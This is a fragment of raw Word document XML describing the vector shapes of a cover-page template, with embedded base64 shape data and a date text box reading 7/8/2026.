zalFPVUBFtBvE2TaRKa3Q3ZbZK+vdOTnobh&#10;//jnm3w1m06MNPjWWQ1qEYEgW7qqtbWGr/3bwxMIH9BW2DlLGi7kYVXc3uSYVW6ynzTuQi24xPoM&#10;NTQh9JmUvmzIoF+4nixnRzcYDLwOtawGnLjcdPIxilJpsLV8ocGeNg2Vp93ZaHifcFov1eu4PR03&#10;l5998vG9VaT1/d28fgERaA5/MFz1WR0Kdjq4s6286DQkKmXyOhUIzuN4GYM4MJjGzwnIIpf/Xyh+&#10;AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29u&#10;dGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAA&#10;LwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACJdFovkEgAAHpcAAA4AAAAAAAAAAAAAAAAA&#10;LgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhACAj7MjgAAAACgEAAA8AAAAAAAAAAAAA&#10;AAAAPhUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAABLFgAAAAA=&#10;" o:allowincell="f">
                <v:shape id="Rectangle 3" o:spid="_x0000_s1027" style="position:absolute;width:2203;height:101498;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wYCJwgAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ra8Iw&#10;FIXfB/6HcAVfxkzXQSfVKDIQ9GWszh9wae6aanNTkqjtfv0yGOzxcM75Dme1GWwnbuRD61jB8zwD&#10;QVw73XKj4PS5e1qACBFZY+eYFIwUYLOePKyw1O7OFd2OsREJwqFEBSbGvpQy1IYshrnriZP35bzF&#10;mKRvpPZ4T3DbyTzLCmmx5bRgsKc3Q/XleLUKDi/vr2euvgvz2Hqk64iSPlCp2XTYLkFEGuJ/+K+9&#10;1wpy+L2SboBc/wAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDTwYCJwgAAANoAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m,l21600,r,21600l,21600,,xe" fillcolor="#0e2841" stroked="f" strokeweight=".53mm">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Pentagon 4" o:spid="_x0000_s1028" style="position:absolute;top:16311;width:24879;height:6142;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" coordsize="87449,216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PlscwAAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvC/6H8ARva+oqItVUxEUQ1suq4PXRPNvS5qUm0Xb/vREWPA4z8w2zWvemEQ9yvrKsYDJOQBDn&#10;VldcKDifdp8LED4ga2wsk4I/8rDOBh8rTLXt+Jcex1CICGGfooIyhDaV0uclGfRj2xJH72qdwRCl&#10;K6R22EW4aeRXksylwYrjQoktbUvK6+PdKJj5uv9e3NyJL/aHJ4du6uyGlRoN+80SRKA+vMP/7b1W&#10;MIXXlXgDZPYEAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA5T5bHMAAAADaAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" adj="-11796480,,5400" path="m,l76649,,87449,10800,76649,21600,,21600,,xe" fillcolor="#156082" stroked="f" strokeweight=".53mm">
                  <v:stroke joinstyle="miter"/>
                  <v:formulas/>
                  <v:path arrowok="t" o:connecttype="custom" textboxrect="0,0,82048,21622"/>
                  <v:textbox inset=",0,14.4pt,0">
                    <w:txbxContent>
                      <w:p w14:paraId="02F55F04" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:after="0"/>
                          <w:jc w:val="right"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                          </w:rPr>
                          <w:t>7/8/2026</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:group id="Group 499677978" o:spid="_x0000_s1029" style="position:absolute;left:864;top:46825;width:23324;height:54615" coordsize="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OsM0yQAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LasJA&#10;FN0X+g/DLbirk2hrTOooIlq6kIIPkO4umWsSzNwJmTGJf99ZFLo8nPdiNZhadNS6yrKCeByBIM6t&#10;rrhQcD7tXucgnEfWWFsmBQ9ysFo+Py0w07bnA3VHX4gQwi5DBaX3TSaly0sy6Ma2IQ7c1bYGfYBt&#10;IXWLfQg3tZxE0UwarDg0lNjQpqT8drwbBZ899utpvO32t+vm8XN6/77sY1Jq9DKsP0B4Gvy/+M/9&#10;pRW8peksSdIkbA6Xwh2Qy18AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA5zrDNMkAAADi&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;">
                  <v:group id="Group 2087088053" o:spid="_x0000_s1030" style="position:absolute;left:108000;width:1870560;height:5461560" coordsize="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KqzIywAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvhX6H5RV6q7tRrCG6ikhbehDBPyDeHtlnEsy+DdltEr99tyD0OMzMb5jFarC16Kj1lWMNyUiB&#10;IM6dqbjQcDp+vqUgfEA2WDsmDXfysFo+Py0wM67nPXWHUIgIYZ+hhjKEJpPS5yVZ9CPXEEfv6lqL&#10;Icq2kKbFPsJtLcdKvUuLFceFEhvalJTfDj9Ww1eP/XqSfHTb23Vzvxynu/M2Ia1fX4b1HESgIfyH&#10;H+1vo2Gs0plKUzWdwN+n+Afk8hcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAA&#10;ABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAOKqzIywAA&#10;AOMAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;">
                    <v:shape id="Freeform 20" o:spid="_x0000_s1031" style="position:absolute;left:408240;top:3508200;width:345600;height:1221840;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tyXUxQAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5Qne6sairUQ3IoIgXqS2Vbw9ss8kJPs27q4x7a/vFgo9DjPzDbNY9qYRHTlfWVYwHiUg&#10;iHOrKy4UfLxvnmYgfEDW2FgmBV/kYZk9Piww1fbOb9QdQiEihH2KCsoQ2lRKn5dk0I9sSxy9i3UG&#10;Q5SukNrhPcJNI5+T5EUarDgulNjSuqS8PtyMgvPx+mlfdberO3fe36bf1em4Wis1HPSrOYhAffgP&#10;/7W3WsEEfq/EGyCzHwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQALtyXUxQAAANoAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,l39,152,84,304r38,113l122,440,76,306,39,180,6,53,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:path arrowok="t" textboxrect="0,0,122,440"/>
                    </v:shape>
                    <v:shape id="Freeform 21" o:spid="_x0000_s1032" style="position:absolute;left:770760;top:4714200;width:328320;height:74736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aPJIwgAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvgt8hPMHbmrroItUoIqvsQfyP50fzbKvNS2mytvrpzcKCx2FmfsNMZo0pxJ0ql1tW0O9FIIgT&#10;q3NOFZyOy48RCOeRNRaWScGDHMym7dYEY21r3tP94FMRIOxiVJB5X8ZSuiQjg65nS+LgXWxl0AdZ&#10;pVJXWAe4KeRnFH1JgzmHhQxLWmSU3A6/RoEZnLdl/T3c5bd0tZHrp7uedaJUt9PMxyA8Nf4d/m//&#10;aAVD+LsSboCcvgAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAwaPJIwgAAANoAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m,l8,19,37,93r30,74l116,269r-8,l60,169,30,98,1,25,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:path arrowok="t" textboxrect="0,0,116,269"/>
                    </v:shape>
                    <v:shape id="Freeform 22" o:spid="_x0000_s1033" style="position:absolute;width:396360;height:3533040;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8t1mwwAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gpeSt3UQ5ToKiLVVsGAVjw/ss9saPZtyG41/vuuIHgcZuYbZjrvbC0u1PrKsYKPQQKC&#10;uHC64lLB8Wf1PgbhA7LG2jEpuJGH+az3MsVMuyvv6XIIpYgQ9hkqMCE0mZS+MGTRD1xDHL2zay2G&#10;KNtS6havEW5rOUySVFqsOC4YbGhpqPg9/FkFG5lWb9vdyOfj2nwt8pv93KxPSvVfu8UERKAuPMOP&#10;9rdWkML9SrwBcvYPAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEANfLdZsMAAADaAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,l,,1,79r2,80l12,317,23,476,39,634,58,792,83,948r24,138l135,1223r5,49l138,1262,105,1106,77,949,53,792,35,634,20,476,9,317,2,159,,79,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:path arrowok="t" textboxrect="0,0,140,1272"/>
                    </v:shape>
                    <v:shape id="Freeform 23" o:spid="_x0000_s1034" style="position:absolute;left:356760;top:1136520;width:127080;height:2372400;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vf2wgAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/dagIx&#10;FITvBd8hHKF3NVvFqqtRRFuqd/49wGFz3KzdnCxJquvbN4WCl8PMfMPMl62txY18qBwreOtnIIgL&#10;pysuFZxPn68TECEia6wdk4IHBVguup055trd+UC3YyxFgnDIUYGJscmlDIUhi6HvGuLkXZy3GJP0&#10;pdQe7wluaznIsndpseK0YLChtaHi+/hjFTQftPW76chsLsNyOJGbPV+/Vkq99NrVDESkNj7D/+2t&#10;VjCGvyvpBsjFLwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBCavf2wgAAANoAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m45,r,l35,66r-9,67l14,267,6,401,3,534,6,669r8,134l18,854r,-3l9,814,8,803,1,669,,534,3,401,12,267,25,132,34,66,45,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:path arrowok="t" textboxrect="0,0,45,854"/>
                    </v:shape>
                    <v:shape id="Freeform 24" o:spid="_x0000_s1035" style="position:absolute;left:396720;top:3533760;width:436320;height:1746720;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rhRFvwAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0L+x/CCN401QWRrmkRxWURPGiFvY7N2BabSbfJ1uqvNwfB4+N9L9Pe1KKj1lWWFUwnEQji3OqK&#10;CwWnbDtegHAeWWNtmRTcyUGafAyWGGt74wN1R1+IEMIuRgWl900spctLMugmtiEO3MW2Bn2AbSF1&#10;i7cQbmo5i6K5NFhxaCixoXVJ+fX4bxRsHrsrafrdF5+4mva77+zv3G2UGg371RcIT71/i1/uH60g&#10;bA1Xwg2QyRMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAAAAAA&#10;AAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB6rhRFvwAAANoAAAAPAAAAAAAA&#10;AAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA8wIAAAAA&#10;" path="m,l10,44r11,82l34,207r19,86l75,380r25,86l120,521r21,55l152,618r2,11l140,595,115,532,93,468,67,383,47,295,28,207,12,104,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:path arrowok="t" textboxrect="0,0,154,629"/>
                    </v:shape>
                    <v:shape id="Freeform 25" o:spid="_x0000_s1036" style="position:absolute;left:855720;top:5269680;width:93240;height:191160;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ljnjwgAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/BasMw&#10;EETvhf6D2EAvJZHbQ9I4kY3dUgi5xe2hx0Xa2CbWyliq7f59FQjkOMzMG2afz7YTIw2+dazgZZWA&#10;INbOtFwr+P76XL6B8AHZYOeYFPyRhzx7fNhjatzEJxqrUIsIYZ+igiaEPpXS64Ys+pXriaN3doPF&#10;EOVQSzPgFOG2k69JspYWW44LDfb03pC+VL9WASXP5aYey2n8QVcWH0ddFaVW6mkxFzsQgeZwD9/a&#10;B6NgC9cr8QbI7B8AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA5ljnjwgAAANoAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m,l33,69r-9,l12,35,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:path arrowok="t" textboxrect="0,0,33,69"/>
                    </v:shape>
                    <v:shape id="Freeform 26" o:spid="_x0000_s1037" style="position:absolute;left:382320;top:3397320;width:41760;height:258480;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E7+UxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8JA&#10;DIXvC/6HIYKXRad6kLU6igiCiCzorgdvoRPbaidTOqOt/35zEPaW8F7e+7JYda5ST2pC6dnAeJSA&#10;Is68LTk38PuzHX6BChHZYuWZDLwowGrZ+1hgan3LR3qeYq4khEOKBooY61TrkBXkMIx8TSza1TcO&#10;o6xNrm2DrYS7Sk+SZKodliwNBda0KSi7nx7OwOfsht822/Fh1l2O3m3W5/25NWbQ79ZzUJG6+G9+&#10;X++s4Au9/CID6OUfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAF4Tv5TEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,l9,37r,3l15,93,5,49,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:path arrowok="t" textboxrect="0,0,15,93"/>
                    </v:shape>
                    <v:shape id="Freeform 27" o:spid="_x0000_s1038" style="position:absolute;left:754200;top:2586240;width:1116360;height:2127960;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A458xAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;EIXvgv9hGaEX0Y2lLRpdpQgthfai1fuYHZNgdjZmx5j213cLgrcZ3nvfvFmsOleplppQejYwGSeg&#10;iDNvS84N7L7fRlNQQZAtVp7JwA8FWC37vQWm1l95Q+1WchUhHFI0UIjUqdYhK8hhGPuaOGpH3ziU&#10;uDa5tg1eI9xV+jFJXrTDkuOFAmtaF5SdthcXKbPz8/6Jh/v2dy2bd/46yPnyaczDoHudgxLq5G6+&#10;pT9srD+B/1/iAHr5BwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMADjnzEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m394,r,l356,38,319,77r-35,40l249,160r-42,58l168,276r-37,63l98,402,69,467,45,535,26,604,14,673,7,746,6,766,,749r1,-5l7,673,21,603,40,533,65,466,94,400r33,-64l164,275r40,-60l248,158r34,-42l318,76,354,37,394,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:path arrowok="t" textboxrect="0,0,394,766"/>
                    </v:shape>
                    <v:shape id="Freeform 28" o:spid="_x0000_s1039" style="position:absolute;left:754200;top:4730760;width:101520;height:53856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BReKvwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0v+B/CCN7WVBd2pRpFBMFbtaueh2Zsqs2kJFmt/94sLOxtHu9zFqvetuJOPjSOFUzGGQjiyumG&#10;awXH7+37DESIyBpbx6TgSQFWy8HbAnPtHnygexlrkUI45KjAxNjlUobKkMUwdh1x4i7OW4wJ+lpq&#10;j48Ubls5zbJPabHh1GCwo42h6lb+WAX79ml2xheTbPZ1LotrcWo+wkmp0bBfz0FE6uO/+M+902n+&#10;FH5/SQfI5QsAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAAAAAA&#10;AAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAlBReKvwAAANsAAAAPAAAAAAAA&#10;AAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA8wIAAAAA&#10;" path="m,l6,16r1,3l11,80r9,52l33,185r3,9l21,161,15,145,5,81,1,41,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:path arrowok="t" textboxrect="0,0,36,194"/>
                    </v:shape>
                    <v:shape id="Freeform 29" o:spid="_x0000_s1040" style="position:absolute;left:833040;top:5281200;width:87480;height:180360;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dowPwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8Mw&#10;DIXvg/0Ho0Fvi9N2jCarW0phsFtZ10tvIlbirLGc2m6S/vt5MNhN4r3v6Wm9nWwnBvKhdaxgnuUg&#10;iCunW24UnL7en1cgQkTW2DkmBXcKsN08Pqyx1G7kTxqOsREphEOJCkyMfSllqAxZDJnriZNWO28x&#10;ptU3UnscU7jt5CLPX6XFltMFgz3tDVWX482mGi/u+9rrW7GzB47XztTnwtdKzZ6m3RuISFP8N//R&#10;HzpxS/j9JQ0gNz8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA4XaMD8MAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,l31,65r-8,l,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:path arrowok="t" textboxrect="0,0,31,65"/>
                    </v:shape>
                    <v:shape id="Freeform 30" o:spid="_x0000_s1041" style="position:absolute;left:754200;top:4666680;width:19800;height:116280;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A0tzwQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCN7qxhIkRFcRsRCKHrRF8DZmxySYnQ2725j++65Q6G0e73OW68G0oifnG8sKZtMEBHFp&#10;dcOVgq/P99cMhA/IGlvLpOCHPKxXo5cl5to++Ej9KVQihrDPUUEdQpdL6cuaDPqp7Ygjd7POYIjQ&#10;VVI7fMRw08q3JJlLgw3Hhho72tZU3k/fRkFhLlm6M+78ke4P9z67FnjtCqUm42GzABFoCP/iP3eh&#10;4/wUnr/EA+TqFwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAGADS3PBAAAA2wAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m,l6,17,7,42,6,39,,23,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:path arrowok="t" textboxrect="0,0,7,42"/>
                    </v:shape>
                    <v:shape id="Freeform 31" o:spid="_x0000_s1042" style="position:absolute;left:796320;top:5133960;width:127080;height:327600;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1Rj7wAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4X/A/LFLzVTQtKSLOKCoqCl0a9D9nJo2Zn0+xqkn/vFgq9zcf3nHQ1mEY8qHO1ZQXvswgEcW51&#10;zaWCy3n3FoNwHlljY5kUjORgtZy8pJho2/MXPTJfihDCLkEFlfdtIqXLKzLoZrYlDlxhO4M+wK6U&#10;usM+hJtGfkTRQhqsOTRU2NK2ovyW3Y2Ctj+5eFNcf+bXTI56dzS3/bdRavo6rD9BeBr8v/jPfdBh&#10;/hx+fwkHyOUTAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA7NUY+8AAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" path="m,l6,16,21,49,33,84r12,34l44,118,13,53,11,42,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:path arrowok="t" textboxrect="0,0,45,118"/>
                    </v:shape>
                  </v:group>
                  <v:group id="Group 869386146" o:spid="_x0000_s1043" style="position:absolute;top:1076400;width:2332440;height:4385160" coordsize="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YHcAywAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvBb/D8oTe6ia1DTF1FZEqHqTgH5DeHtlnEsy+DdltEr99Vyj0OMzMb5j5cjC16Kh1lWUF8SQC&#10;QZxbXXGh4HzavKQgnEfWWFsmBXdysFyMnuaYadvzgbqjL0SAsMtQQel9k0np8pIMuoltiIN3ta1B&#10;H2RbSN1iH+Cmlq9RlEiDFYeFEhtal5Tfjj9GwbbHfjWNP7v97bq+f5/evy77mJR6Hg+rDxCeBv8f&#10;/mvvtII0mU3TJH5L4HEp3AG5+AUAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAA&#10;ABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB6YHcAywAA&#10;AOIAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;">
                    <v:shape id="Freeform 8" o:spid="_x0000_s1044" style="position:absolute;left:101520;top:1410840;width:528840;height:1866960;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jfMEwQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCF6KbuohlOgqolRyaA+NitchO2aD2dmQXWPy77uFQm/zeJ+z3g62ET11vnas4G2RgCAu&#10;na65UnA+fczfQfiArLFxTApG8rDdTF7WmGn35G/qi1CJGMI+QwUmhDaT0peGLPqFa4kjd3OdxRBh&#10;V0nd4TOG20YukySVFmuODQZb2hsq78XDKrh8Xr7G5Lh77dOrkYeC83KkXKnZdNitQAQawr/4z53r&#10;OD+F31/iAXLzAwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHeN8wTBAAAA2wAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m,l41,155,86,309r39,116l125,450,79,311,41,183,7,54,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:fill opacity="13107f"/>
                      <v:stroke opacity="13107f"/>
                      <v:path arrowok="t" textboxrect="0,0,125,450"/>
                    </v:shape>
                    <v:shape id="Freeform 9" o:spid="_x0000_s1045" style="position:absolute;left:660240;top:3243960;width:498960;height:1140480;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vY4uxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/bagIx&#10;EH0X+g9hCr5pthZt2RqlKBUF0Xqh0LdhM90sbibLJrrbfr0RhL7N4VxnPG1tKS5U+8Kxgqd+AoI4&#10;c7rgXMHx8NF7BeEDssbSMSn4JQ/TyUNnjKl2De/osg+5iCHsU1RgQqhSKX1myKLvu4o4cj+uthgi&#10;rHOpa2xiuC3lIElG0mLBscFgRTND2Wl/tgrmX812s/LJ93p48n+LxacZ8PNOqe5j+/4GIlAb/sV3&#10;91LH+S9w+yUeICdXAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAC69ji7EAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,l8,20,37,96r32,74l118,275r-9,l61,174,30,100,,26,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:fill opacity="13107f"/>
                      <v:stroke opacity="13107f"/>
